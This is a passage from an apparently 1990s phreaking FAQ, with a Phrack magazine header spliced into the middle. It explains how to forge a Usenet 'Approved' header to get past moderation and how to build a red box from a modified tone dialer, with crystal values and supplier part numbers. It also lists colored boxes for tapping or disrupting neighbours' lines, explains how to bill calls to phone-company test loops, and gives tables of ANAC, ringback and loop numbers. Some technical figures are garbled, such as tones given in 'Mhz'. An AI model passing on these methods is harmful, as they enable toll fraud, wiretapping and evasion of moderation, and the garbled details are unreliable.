  7628. Usenet messages consist of message headers and message bodies.  The
  7629. message header tells the news software how to process the message.
  7630. Headers can be divided into two types, required and optional. Required
  7631. headers are ones like "From" and "Newsgroups."  Without the required
  7632. headers, your message will not be posted properly.
  7633.  
  7634. One of the optional headers is the "Approved" header.  To post to a
  7635. moderated newsgroup, simply add an Approved header line to your
  7636. message header.  The header line should contain the newsgroup
  7637. moderators e-mail address.  To see the correct format for your target
  7638. newsgroup, save a message from the newsgroup and then look at it using
  7639. any text editor.
  7640.  
  7641. A "Approved" header line should look like this:
  7642.  
  7643. Approved: will@gnu.ai.mit.edu
  7644.  
  7645. There cannot not be a blank line in the message header.  A blank line
  7646. will cause any portion of the header after the blank line to be
  7647. interpreted as part of the message body.
  7648.  
  7649. For more information, read RFC 1036: Standard for Interchange of
  7650. USENET messages.
  7651.  
  7652.  
  7653.  
  7654.  
  7655. Section B: Telephony
  7656. ~~~~~~~~~~~~~~~~~~~~
  7657.  
  7658. 01. What is a Red Box?
  7659.  
  7660. When a coin is inserted into a payphone, the payphone emits a set of
  7661. tones to ACTS (Automated Coin Toll System).  Red boxes work by fooling
  7662. ACTS into believing you have actually put money into the phone.  The
  7663. red box simply plays the ACTS tones into the telephone microphone.
  7664. ACTS hears those tones, and allows you to place your call.  The actual
  7665. tones are:
  7666.  
  7667. Nickel Signal      1700+2200  0.060s on
  7668. Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating
  7669. Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating
  7670.  
  7671.  
  7672. 02. How do I build a Red Box?
  7673.  
  7674. Red boxes are commonly manufactured from modified Radio Shack tone
  7675. dialers, Hallmark greeting cards, or made from scratch from readily
  7676. available electronic components.
  7677.  
  7678. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
  7679. open the dialer and replace the crystal with a new one.  
  7680. The purpose of the new crystal is to cause the * button on your tone
  7681. dialer to create a 1700Mhz and 2200Mhz tone instead of the original
  7682. 941Mhz and 1209Mhz tones.  The exact value of the replacement crystal
  7683. should be 6.466806 to create a perfect 1700Mhz tone and 6.513698 to
  7684. create a perfect 2200mhz tone. A crystal close to those values will
  7685. create a tone that easily falls within the loose tolerances of ACTS.
  7686. The most popular choice is the 6.5536Mhz crystal, because it is the
  7687. eaiest to procure.  The old crystal is the large shiny metal component
  7688. labeled "3.579545Mhz."  When you are finished replacing the crystal,
  7689. program the P1 button with five *'s.  That will simulate a quarter
  7690. tone each time you press P1.
  7691.  
  7692.  
  7693. 03. Where can I get a 6.5536Mhz crystal?
  7694.  
  7695. Your best bet is a local electronics store.  Radio Shack sells them,
  7696. but they are overpriced and the store must order them in.  This takes
  7697. approximately two weeks.  In addition, many Radio Shack employees do
  7698. not know that this can be done.
  7699.  
  7700. Or, you could order the crystal mail order.  This introduces Shipping
  7701. and Handling charges, which are usually much greater than the price of
  7702. the crystal.  It's best to get several people together to share the
  7703. S&H cost.  Or, buy five or six yourself and sell them later.  Some of
  7704. the places you can order crystals are:
  7705.  
  7706. Digi-Key
  7707. 701 Brooks Avenue South
  7708. P.O. Box 677
  7709. Thief River Falls, MN 56701-0677
  7710. (80)344-4539
  7711. Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
  7712. Part Number:X018-ND
  7713.  
  7714. JDR Microdevices:
  7715. 2233 Branham Lane
  7716. San Jose, CA 95124
  7717. (800)538-5000
  7718. Part Number: 6.5536MHZ
  7719.  
  7720. Tandy Express Order Marketing
  7721. 401 NE 38th Street
  7722. Fort Worth, TX 76106
  7723. (800)241-8742
  7724. Part Number: 10068625
  7725.  
  7726. Alltronics
  7727. 2300 Zanker Road
  7728. San Jose CA 95131
  7729. (408)943-9774 Voice
  7730. (408)943-9776 Fax
  7731. (408)943-0622 BBS
  7732. Part Number: 92A057
  7733.  
  7734.  
  7735. 04. Which payphones will a Red Box work on?
  7736.  
  7737. Red Boxes will work on TelCo owned payphones, but not on COCOT's
  7738. (Customer Owned Coin Operated Telephones).
  7739.  
  7740. Red boxes work by fooling ACTS (Automated Coin Toll System) into
  7741. believing you have put money into the pay phone.  ACTS is the
  7742. telephone company software responsible for saying "Please deposit XX
  7743. cents" and listening for the coins being deposited.
  7744.  
  7745. COCOT's do not use ACTS.  On a COCOT, the pay phone itself is
  7746. responsible for determining what coins have been inserted.
  7747.  
  7748.  
  7749. 05. How do I make local calls with a Red Box?
  7750.  
  7751. Payphones do not use ACTS for local calls.  To use your red box for
  7752. local calls, you have to fool ACTS into getting involved in the call.
  7753.  
  7754. One way to do this, in some areas, is by dialing 10288-xxx-xxxx.  This
  7755. makes your call a long distance call, and brings ACTS into the
  7756. picture.
  7757.  
  7758. In other areas, you can call Directory Assistance and ask for the
  7759. number of the person you are trying to reach.  The operator will give
  7760. you the number and then you will hear a message similar to "Your call
  7761. can be completed automatically for an additional 35 cents."  When this
  7762. happens, you can then use ACTS tones.
  7763.  
  7764.  
  7765. 06. What is a Blue Box?
  7766.  
  7767. Blue boxes use a 2600hz tone to size control of telephone switches
  7768. that use in-band signalling.  The caller may then access special
  7769. switch functions, with the usual purpose of making free long distance
  7770. phone calls, using the tones provided by the Blue Box.
  7771.  
  7772.  
  7773. 07. Do Blue Boxes still work?
  7774.  
  7775. Blue Boxes still work in areas using in band signalling.  Modern phone
  7776. switches use out of band signalling.  Nothing you send over the voice
  7777. portion of bandwidth can control the switch.  If you are in an area
  7778. served by a switch using out of band signalling, you can still blue
  7779. box by calling through an area served by older in-band equipment.
  7780.  
  7781.  
  7782. 08. What is a Black Box?
  7783.  
  7784. A Black Box is a 1.8k ohm resistor placed across your phone line to
  7785. cause the phone company equipment to be unable to detect that you have
  7786. answered your telephone.  People who call you will then not be billed
  7787. for the telephone call.  Black boxes do not work under ESS.
  7788.  
  7789.  
  7790. 09. What do all the colored boxes do?
  7791.  
  7792. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
  7793.          Call Forwarding on old 4-wire phone systems
  7794. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  7795. Beige        Lineman's hand set
  7796. Black        Allows the calling party to not be billed for the call
  7797.          placed
  7798. Blast        Phone microphone amplifier
  7799. Blotto       Supposedly shorts every fone out in the immediate area
  7800. Blue         Emulate a true operator by seizing a trunk with a 2600hz
  7801.          tone
  7802. Brown        Create a party line from 2 phone lines
  7803. Bud          Tap into your neighbors phone line
  7804. Chartreuse   Use the electricity from your phone line
  7805. Cheese       Connect two phones to create a diverter
  7806. Chrome       Manipulate Traffic Signals by Remote Control
  7807. Clear        A telephone pickup coil and a small amp used to make free
  7808.          calls on Fortress Phones
  7809. Color        Line activated telephone recorder
  7810. Copper       Cause crosstalk interference on an extender
  7811. Crimson      Hold button
  7812. Dark         Re-route outgoing or incoming calls to another phone
  7813. Dayglo       Connect to your neighbors phone line
  7814. Divertor     Re-route outgoing or incoming calls to another phone
  7815. DLOC         Create a party line from 2 phone lines
  7816. Gold         Dialout router
  7817. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  7818. Infinity     Remotely activated phone tap
  7819. Jack         Touch-Tone key pad
  7820. Light        In-use light
  7821. Lunch        AM transmitter
  7822. Magenta      Connect a remote phone line to another remote phone line
  7823. Mauve        Phone tap without cutting into a line
  7824. Neon         External microphone
  7825. Noise        Create line noise
  7826. Olive        External ringer
  7827. Party        Create a party line from 2 phone lines
  7828. Pearl        Tone generator
  7829. Pink         Create a party line from 2 phone lines
  7830. Purple       Telephone hold button
  7831. Rainbow      Kill a trace by putting 120v into the phone line (joke)
  7832. Razz         Tap into your neighbors phone
  7833. Red          Make free phone calls from pay phones by generating
  7834.          quarter tones
  7835. Rock         Add music to your phone line
  7836. Scarlet      Cause a neighbors phone line to have poor reception
  7837. Silver       Create the DTMF tones for A, B, C and D
  7838. Static       Keep the voltage on a phone line high
  7839. Switch       Add hold, indicator lights, conferencing, etc..
  7840. Tan          Line activated telephone recorder
  7841. Tron         Reverse the phase of power to your house, causing your
  7842.          electric meter to run slower
  7843. TV Cable     "See" sound waves on your TV
  7844. Urine        Create a capacitative disturbance between the ring and
  7845.          tip wires in another's telephone headset
  7846. Violet       Keep a payphone from hanging up
  7847. White        Portable DTMF keypad
  7848. Yellow       Add an extension phone
  7849.  
  7850. Box schematics may be retrieved from these FTP sites:
  7851.  
  7852. ftp.netcom.com          /pub/br/bradleym
  7853. ftp.netcom.com          /pub/va/vandal
  7854. ftp.winternet.com       /users/craigb
  7855.  
  7856.  
  7857.                               ==Phrack Magazine==
  7858.  
  7859.                  Volume Six, Issue Forty-Seven, File 7 of 22
  7860.  
  7861.  
  7862. 10. What is an ANAC number?
  7863.  
  7864. An ANAC (Automatic Number Announcement Circuit) number is a telephone
  7865. number that plays back the number of the telephone that called it.
  7866. ANAC numbers are convenient if you want to know the telephone number
  7867. of a pair of wires.
  7868.  
  7869.  
  7870. 11. What is the ANAC number for my area?
  7871.  
  7872. How to find your ANAC number:
  7873.  
  7874. Look up your NPA (Area Code) and try the number listed for it. If that
  7875. fails, try 1 plus the number listed for it.  If that fails, try the
  7876. common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
  7877. number for your area, please let us know.
  7878.  
  7879. Note that many times the ANAC number will vary for different switches
  7880. in the same city.  The geographic naming on the list is NOT intended
  7881. to be an accurate reference for coverage patterns, it is for
  7882. convenience only.
  7883.  
  7884. Many companies operate 800 number services which will read back to you
  7885. the number from which you are calling.  Many of these require
  7886. navigating a series of menus to get the phone number you are looking
  7887. for.
  7888.  
  7889.   (800)238-4959   A voice mail system
  7890.   (800)328-2630   A phone sex line
  7891.   (800)568-3197   Info Access Telephone Company's Automated Blocking Line
  7892.   (800)571-8859   A phone sex line
  7893.   (800)692-6447   (800)MY-ANI-IS
  7894.   (800)769-3766   Duke Power Company Automated Outage System
  7895.   (800)455-3256   Unknown
  7896.  
  7897. An non-800 ANAC that works nationwide is 404-988-9664.  The one catch
  7898. with this number is that it must be dialed with the AT&T Carrier
  7899. Access Code 10732.
  7900.  
  7901. Another non-800 nationwide ANAC is Glen Robert of Full Disclosure
  7902. Magazine's number, 10555-1-708-356-9646.
  7903.  
  7904. Please use local ANAC numbers if you can, as abuse or overuse kills
  7905. 800 ANAC numbers.
  7906.  
  7907.   NPA  ANAC number      Geographic area
  7908.   ---  ---------------  ---------------------------------------------
  7909.   201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  7910.   202  811              District of Columbia
  7911.   203  970              CT
  7912.   205  300-222-2222     Birmingham, AL
  7913.   205  300-555-5555     Many small towns in AL
  7914.   205  300-648-1111     Dora, AL
  7915.   205  300-765-4321     Bessemer, AL
  7916.   205  300-798-1111     Forestdale, AL
  7917.   205  300-833-3333     Birmingham
  7918.   205  557-2311         Birmingham, AL
  7919.   205  811              Pell City/Cropwell/Lincoln, AL
  7920.   205  841-1111         Tarrant, AL
  7921.   205  908-222-2222     Birmingham, AL
  7922.   206  411              WA (Not US West)
  7923.   207  958              ME
  7924.   209  830-2121         Stockton, CA
  7925.   209  211-9779         Stockton, CA
  7926.   212  958              Manhattan, NY
  7927.   213  114              Los Angeles, CA (GTE)
  7928.   213  1223             Los Angeles, CA (Some 1AESS switches)
  7929.   213  211-2345         Los Angeles, CA (English response)
  7930.   213  211-2346         Los Angeles, CA (DTMF response)
  7931.   213  760-2???         Los Angeles, CA (DMS switches)
  7932.   213  61056            Los Angeles, CA
  7933.   214  570              Dallas, TX
  7934.   214  790              Dallas, TX (GTE)
  7935.   214  970-222-2222     Dallas, TX
  7936.   214  970-611-1111     Dallas, TX (Southwestern Bell)
  7937.   215  410-xxxx         Philadelphia, PA
  7938.   215  511              Philadelphia, PA
  7939.   215  958              Philadelphia, PA
  7940.   216  331              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  7941.   217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  7942.   219  550              Gary/Hammond/Michigan City/Southbend, IN
  7943.   219  559              Gary/Hammond/Michigan City/Southbend, IN
  7944.   301  958-9968         Hagerstown/Rockville, MD
  7945.   310  114              Long Beach, CA (On many GTE switches)
  7946.   310  1223             Long Beach, CA (Some 1AESS switches)
  7947.   310  211-2345         Long Beach, CA (English response)
  7948.   310  211-2346         Long Beach, CA (DTMF response)
  7949.   312  200              Chicago, IL
  7950.   312  290              Chicago, IL
  7951.   312  1-200-8825       Chicago, IL (Last four change rapidly)
  7952.   312  1-200-555-1212   Chicago, IL
  7953.   313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  7954.   313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  7955.   313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  7956.   313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  7957.   314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO
  7958.   315  953              Syracuse/Utica, NY
  7959.   315  958              Syracuse/Utica, NY
  7960.   315  998              Syracuse/Utica, NY
  7961.   317  310-222-2222     Indianapolis/Kokomo, IN
  7962.   317  559-222-2222     Indianapolis/Kokomo, IN
  7963.   317  743-1218         Indianapolis/Kokomo, IN
  7964.   401  200-200-4444     RI
  7965.   401  222-2222         RI
  7966.   402  311              Lincoln, NE
  7967.   404  311              Atlanta, GA
  7968.   404  940-xxx-xxxx     Atlanta, GA
  7969.   404  990              Atlanta, GA
  7970.   405  890-7777777      Enid/Oklahoma City, OK
  7971.   405  897              Enid/Oklahoma City, OK
  7972.   407  200-222-2222     Orlando/West Palm Beach, FL
  7973.   408  300-xxx-xxxx     San Jose, CA
  7974.   408  760              San Jose, CA
  7975.   408  940              San Jose, CA
  7976.   409  951              Beaumont/Galveston, TX
  7977.   409  970-xxxx         Beaumont/Galveston, TX
  7978.   410  200-6969         A
  7979.   410  200-555-1212     A
  7980.   410  811              Annapolis/Baltimore, MD
  7981.   412  711-6633         Pittsburgh, PA
  7982.   412  711-4411         Pittsburgh, PA
  7983.   412  999-xxxx         Pittsburgh, PA
  7984.   413  958              Pittsfield/Springfield, MA
  7985.   413  200-555-5555     Pittsfield/Springfield, MA
  7986.   414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  7987.   415  200-555-1212     San Francisco, CA
  7988.   415  211-2111         San Francisco, CA
  7989.   415  2222             San Francisco, CA
  7990.   415  640              San Francisco, CA
  7991.   415  760-2878         San Francisco, CA
  7992.   415  7600-2222        San Francisco, CA
  7993.   419  311              Toledo, OH
  7994.   502  2002222222       Frankfort/Louisville/Paducah/Shelbyville, KY
  7995.   502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  7996.   503  611              Portland, OR
  7997.   503  999              Portland, OR (GTE)
  7998.   504  99882233         Baton Rouge/New Orleans, LA
  7999.   504  201-269-1111     Baton Rouge/New Orleans, LA
  8000.   504  998              Baton Rouge/New Orleans, LA
  8001.   504  99851-0000000000 Baton Rouge/New Orleans, LA
  8002.   508  958              Fall River/New Bedford/Worchester, MA
  8003.   508  200-222-1234     Fall River/New Bedford/Worchester, MA
  8004.   508  200-222-2222     Fall River/New Bedford/Worchester, MA
  8005.   508  26011            Fall River/New Bedford/Worchester, MA
  8006.   509  560              Spokane/Walla Walla/Yakima, WA
  8007.   512  830              Austin/Corpus Christi, TX
  8008.   512  970-xxxx         Austin/Corpus Christi, TX
  8009.   515  5463             Des Moines, IA
  8010.   515  811              Des Moines, IA
  8011.   516  958              Hempstead/Long Island, NY
  8012.   516  968              Hempstead/Long Island, NY
  8013.   517  200-222-2222     Bay City/Jackson/Lansing, MI
  8014.   517  200200200200200  Bay City/Jackson/Lansing, MI
  8015.   518  997              Albany/Schenectady/Troy, NY
  8016.   518  998              Albany/Schenectady/Troy, NY
  8017.   603  200-222-2222     NH
  8018.   606  997-555-1212     Ashland/Winchester, KY
  8019.   606  711              Ashland/Winchester, KY
  8020.   607  993              Binghamton/Elmira, NY
  8021.   609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  8022.   610  958              Allentown/Reading, PA
  8023.   612  511              Minneapolis/St.Paul, MN
  8024.   614  200              Columbus/Steubenville, OH
  8025.   614  571              Columbus/Steubenville, OH
  8026.   615  200200200200200  Chatanooga/Knoxville/Nashville, TN
  8027.   615  2002222222       Chatanooga/Knoxville/Nashville, TN
  8028.   615  830              Nashville, TN
  8029.   616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  8030.   617  200-222-1234     Boston, MA
  8031.   617  200-222-2222     Boston, MA
  8032.   617  200-444-4444     Boston, MA (Woburn, MA)
  8033.   617  220-2622         Boston, MA
  8034.   617  958              Boston, MA
  8035.   618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  8036.   618  930              Alton/Cairo/Mt.Vernon, IL
  8037.   619  211-2001         San Diego, CA
  8038.   703  811              Alexandria/Arlington/Roanoke, VA
  8039.   704  311              Asheville/Charlotte, NC
  8040.   708  1-200-555-1212   Chicago/Elgin, IL
  8041.   708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
  8042.   708  200-6153         Chicago/Elgin, IL
  8043.   708  724-9951         Chicago/Elgin, IL
  8044.   708  356-9646         Chicago/Elgin, IL
  8045.   713  380              Houston, TX
  8046.   713  970-xxxx         Houston, TX
  8047.   713  811              Humble, TX
  8048.   714  114              Anaheim, CA (GTE)
  8049.   714  211-2121         Anaheim, CA (PacBell)
  8050.   714  211-2222         Anaheim, CA (Pacbell)
  8051.   716  511              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  8052.   716  990              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  8053.   717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  8054.   718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  8055.   802  2-222-222-2222   Vermont
  8056.   802  200-222-2222     Vermont
  8057.   802  1-700-222-2222   Vermont
  8058.   802  111-2222         Vermont
  8059.   805  114              Bakersfield/Santa Barbara, CA
  8060.   805  211-2345         Bakersfield/Santa Barbara, CA
  8061.   805  211-2346         Bakersfield/Santa Barbara, CA (Returns DTMF)
  8062.   805  830              Bakersfield/Santa Barbara, CA
  8063.   806  970-xxxx         Amarillo/Lubbock, TX
  8064.   810  200200200200200  Flint/Pontiac/Southfield/Troy, MI
  8065.   812  410-555-1212     Evansville, IN
  8066.   813  311              Ft. Meyers/St. Petersburg/Tampa, FL
  8067.   815  200-xxx-xxxx     La Salle/Rockford, IL
  8068.   815  290              La Salle/Rockford, IL
  8069.   817  211              Ft. Worth/Waco, TX
  8070.   817  970-611-1111     Ft. Worth/Waco, TX  (Southwestern Bell)
  8071.   818  1223             Pasadena, CA (Some 1AESS switches)
  8072.   818  211-2345         Pasadena, CA (English response)
  8073.   818  211-2346         Pasadena, CA (DTMF response)
  8074.   903  970-611-1111     Denison, TX
  8075.   906  1-200-222-2222   Marquette/Sault Ste. Marie, MI
  8076.   908  958              New Brunswick, NJ
  8077.   910  200              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  8078.   910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  8079.   910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  8080.   914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  8081.   915  970-xxxx         Abilene/El Paso, TX
  8082.   916  211-2222         Sacramento, CA (Pac Bell)
  8083.   916  461              Sacramento, CA (Roseville Telepohone)
  8084.   919  200              Durham, NC
  8085.   919  711              Durham, NC
  8086.  
  8087.   Canada:
  8088.   204  644-xxxx         Manitoba
  8089.   306  115              Saskatchewan, Canada
  8090.   403  311              Alberta, Yukon and N.W. Territory
  8091.   403  908-222-2222     Alberta, Yukon and N.W. Territory
  8092.   403  999              Alberta, Yukon and N.W. Territory
  8093.   416  997-xxxx         Toronto, Ontario
  8094.   506  1-555-1313       New Brunswick
  8095.   514  320-xxxx         Montreal, Quebec
  8096.   519  320-xxxx         London, Ontario
  8097.   604  1116             British Columbia, Canada
  8098.   604  1211             British Columbia, Canada
  8099.   604  211              British Columbia, Canada
  8100.   613  320-2232         Ottawa, Ontario
  8101.   705  320-4567         North Bay/Saulte Ste. Marie, Ontario
  8102.  
  8103.   Australia:
  8104.   +61  03-552-4111      Victoria 03 area
  8105.   +612 19123            All major capital cities
  8106.  
  8107.   United Kingdom:
  8108.   175
  8109.  
  8110.  
  8111. 12. What is a ringback number?
  8112.  
  8113. A ringback number is a number that you call that will immediately
  8114. ring the telephone from which it was called.
  8115.  
  8116. In most instances you must call the ringback number, quickly hang up
  8117. the phone for just a short moment and then let up on the switch, you
  8118. will then go back off hook and hear a different tone.  You may then
  8119. hang up.  You will be called back seconds later.
  8120.  
  8121.  
  8122. 13. What is the ringback number for my area?
  8123.  
  8124. An 'x' means insert those numbers from the phone number from which you
  8125. are calling.  A '?' means that the number varies from switch to switch
  8126. in the area, or changes from time to time.  Try all possible
  8127. combinations.
  8128.  
  8129. If the ringback for your NPA is not listed, try common ones such as
  8130. 954, 957 and 958.  Also, try using the numbers listed for other NPA's
  8131. served by your telephone company.
  8132.  
  8133.   NPA  Ringback number  Geographic area
  8134.   ---  ---------------  ---------------------------------------------
  8135.   201  55?-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
  8136.   202  958-xxxx         District of Columbia
  8137.   203  99?-xxxx         CT
  8138.   208  99xxx-xxxx       ID
  8139.   213  1-95x-xxxx       Los Angeles, CA
  8140.   219  571-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  8141.   219  777-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  8142.   301  579-xxxx         Hagerstown/Rockville, MD
  8143.   301  958-xxxx         Hagerstown/Rockville, MD
  8144.   303  99X-xxxx         Grand Junction, CO
  8145.   304  998-xxxx         WV
  8146.   305  999-xxxx         Ft. Lauderdale/Key West/Miami, FL
  8147.   312  511-xxxx         Chicago, IL
  8148.   312  511-xxx-xxxx     Chicago, IL
  8149.   312  57?-xxxx         Chicago, IL
  8150.   315  98x-xxxx         Syracuse/Utica, NY
  8151.   317  777-xxxx         Indianapolis/Kokomo, IN
  8152.   317  yyy-xxxx         Indianapolis/Kokomo, IN (y=3rd digit of phone number)
  8153.   319  79x-xxxx         Davenport/Dubuque, Iowa
  8154.   401  98?-xxxx         RI
  8155.   404  450-xxxx         Atlanta, GA
  8156.   407  988-xxxx         Orlando/West Palm Beach, FL
  8157.   412  985-xxxx         Pittsburgh, PA
  8158.   414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  8159.   414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  8160.   415  350-xxxx         San Francisco, CA
  8161.   417  551-xxxx         Joplin/Springfield, MO
  8162.   501  221-xxx-xxxx     AR
  8163.   501  721-xxx-xxxx     AR
  8164.   502  988              Frankfort/Louisville/Paducah/Shelbyville, KY
  8165.   503  541-XXXX         OR
  8166.   504  99x-xxxx         Baton Rouge/New Orleans, LA
  8167.   504  9988776655       Baton Rouge/New Orleans, LA
  8168.   505  59?-xxxx         New Mexico
  8169.   512  95X-xxxx         Austin, TX
  8170.   513  99?-xxxx         Cincinnati/Dayton, OH
  8171.   513  955-xxxx         Cincinnati/Dayton, OH
  8172.   516  660-xxx-xxxx     Hempstead/Long Island, NY
  8173.   601  777-xxxx         MS
  8174.   609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
  8175.   612  511              Minneapolis/St.Paul, MN
  8176.   612  999-xxx-xxxx     Minneapolis/St.Paul, MN
  8177.   614  998-xxxx         Columbus/Steubenville, OH
  8178.   615  930-xxxx         Chatanooga/Knoxville/Nashville, TN
  8179.   616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI
  8180.   619  331-xxxx         San Diego, CA
  8181.   619  332-xxxx         San Diego, CA
  8182.   703  958-xxxx         Alexandria/Arlington/Roanoke, VA
  8183.   708  511-xxxx         Chicago/Elgin, IL
  8184.   714  330?             Anaheim, CA (GTE)
  8185.   714  33?-xxxx         Anaheim, CA (PacBell)
  8186.   716  981-xxxx         Rochester, NY (Rochester Tel)
  8187.   718  660-xxxx         Bronx/Brooklyn/Queens/Staten Island, NY
  8188.   719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
  8189.   801  938-xxxx         Utah
  8190.   801  939-xxxx         Utah
  8191.   802  987-xxxx         Vermont
  8192.   804  260              Charlottesville/Newport News/Norfolk/Richmond, VA
  8193.   805  114              Bakersfield/Santa Barbara, CA
  8194.   805  980-xxxx         Bakersfield/Santa Barbara, CA
  8195.   810  951-xxx-xxxx     Pontiac/Southfield/Troy, MI
  8196.   813  711              Ft. Meyers/St. Petersburg/Tampa, FL
  8197.   817  971              Ft. Worth/Waco, TX (Flashhook, then 2#)
  8198.   906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI
  8199.   908  55?-xxxx         New Brunswick, NJ
  8200.   908  953              New Brunswick, NJ
  8201.   913  951-xxxx         Lawrence/Salina/Topeka, KS
  8202.   914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  8203.  
  8204.   Canada:
  8205.   416  57x-xxxx         Toronto, Ontario
  8206.   416  99x-xxxx         Toronto, Ontario
  8207.   416  999-xxx-xxxx     Toronto, Ontario
  8208.   506  572+xxx-xxxx     New Brunswick
  8209.   514  320-xxx-xxxx     Montreal, Quebec
  8210.   613  999-xxx-xxxx     Ottawa, Ontario
  8211.   705  999-xxx-xxxx     North Bay/Saulte Ste. Marie, Ontario
  8212.  
  8213.   Australia: +61 199
  8214.   Brazil: 199
  8215.   New Zealand: 137
  8216.   Sweden: 0058
  8217.   United Kingdom: 174 or 1744 or 175 or 0500-89-0011
  8218.  
  8219.  
  8220. 14. What is a loop?
  8221.  
  8222. This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
  8223.                    by Minor Threat & Mucho Maas
  8224.  
  8225. Loops are a pair of phone numbers, usually consecutive, like 836-9998
  8226. and 836-9999.  They are used by the phone company for testing.  What
  8227. good do loops do us?  Well, they are cool in a few ways.  Here is a
  8228. simple use of loops.  Each loop has two ends, a 'high' end, and a
  8229. 'low' end.  One end gives a (usually) constant, loud tone when it is
  8230. called. The other end is silent.  Loops don't usually ring either.
  8231. When BOTH ends are called, the people that called each end can talk
  8232. through the loop.  Some loops are voice filtered and won't pass
  8233. anything but a constant tone; these aren't much use to you.  Here's
  8234. what you can use working loops for:  billing phone calls!  First, call
  8235. the end that gives the loud tone.  Then if the operator or someone
  8236. calls the other end, the tone will go quiet.  Act like the phone just
  8237. rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
  8238. what the fuck ever.  The operator thinks that she just called you, and
  8239. that's it!  Now the phone bill will go to the loop, and your local
  8240. RBOC will get the bill!  Use this technique in moderation, or the loop
  8241. may go down.  Loops are probably most useful when you want to talk to
  8242. someone to whom you don't want to give your phone number.
  8243.  
  8244.  
  8245. 15. What is a loop in my area?
  8246.  
  8247. Many of these loops are no longer functional.  If you are local
  8248. to any of these loops, please try them out an e-mail me the results
  8249. of your research.
  8250.  
  8251.   NPA    High      Low
  8252.   ---  --------  --------
  8253.   201  228-9929  228-9930
  8254.   201  238-9929  238-9930
  8255.   201  251-9929  251-9930
  8256.   201  254-9929  254-9930
  8257.   201  272-9929  272-9930
  8258.   201  330-9929  330-9930
  8259.   201  333-9929  333-9930
  8260.   201  339-9929  339-9930
  8261.   201  347-9929  347-9930
  8262.   201  376-9929  376-9930
  8263.   201  398-9929  398-9930
  8264.   201  467-9929  467-9930
  8265.   201  528-9929  528-9930
  8266.   201  531-9929  531-9930
  8267.   201  558-9929  558-9930
  8268.   201  559-9929  559-9930
  8269.   201  560-9929  560-9930
  8270.   201  592-9929  592-9930
  8271.   201  625-9929  625-9930
  8272.   201  631-9929  631-9930
  8273.   201  637-9929  637-9930
  8274.   201  655-9929  655-9930
  8275.   201  666-9929  666-9930
  8276.   201  690-9929  690-9930
  8277.   201  761-9929  761-9930
  8278.   201  762-9929  762-9929
  8279.   201  762-9929  762-9930
  8280.   201  763-9929  763-9930
  8281.   201  764-9929  764-9930
  8282.   201  767-9929  767-9930
  8283.   201  768-9929  768-9930
  8284.   201  773-9929  773-9930
  8285.   201  879-9929  879-9930
  8286.   201  938-9929  938-9930
  8287.   201  946-9929  946-9930
  8288.   201  992-9929  992-9930
  8289.   201  993-9929  993-9930
  8290.   201  994-9929  994-9930
  8291.   206  827-0018  827-0019
  8292.   206  988-0020  988-0022
  8293.   208  862-9996  862-9997
  8294.   209  732-0044  732-0045
  8295.   201  666-9929  666-9930
  8296.   210  993-9929  993-9930
  8297.   210  330-9929  330-9930
  8298.   210  333-9929  333-9930
  8299.   210  376-9929  376-9930
  8300.   210  467-9929  467-9930
  8301.   212  220-9977  220-9979
  8302.   212  283-9977  283-9979
  8303.   212  283-9977  283-9997
  8304.   212  352-9900  352-9906
  8305.   212  365-9977  365-9979
  8306.   212  529-9900  529-9906
  8307.   212  562-9977  562-9979
  8308.   212  986-9977  986-9979
  8309.   213  360-1118  360-1119
  8310.   213  365-1118  365-1119
  8311.   213  455-0002  455-XXXX
  8312.   213  455-0002  455-xxxx
  8313.   213  546-0002  546-XXXX
  8314.   213  546-0002  546-xxxx
  8315.   213  549-1118  549-1119
  8316.   214  291-4759  291-4757
  8317.   214  299-4759  299-4757
  8318.   305  778-9952  778-9951
  8319.   305  964-9951  964-9952
  8320.   307  468-9999  468-9998
  8321.   308  357-0004  357-0005
  8322.   310  365-1118  365-1119
  8323.   310  445-0002  445-????
  8324.   310  455-0002  455-????
  8325.   310  545-0002  545-????
  8326.   310  546-0002  546-????
  8327.   312  262-9902  262-9903
  8328.   313  224-9996  224-9997
  8329.   313  225-9996  225-9997
  8330.   313  234-9996  234-9997
  8331.   313  237-9996  237-9997
  8332.   313  256-9996  256-9997
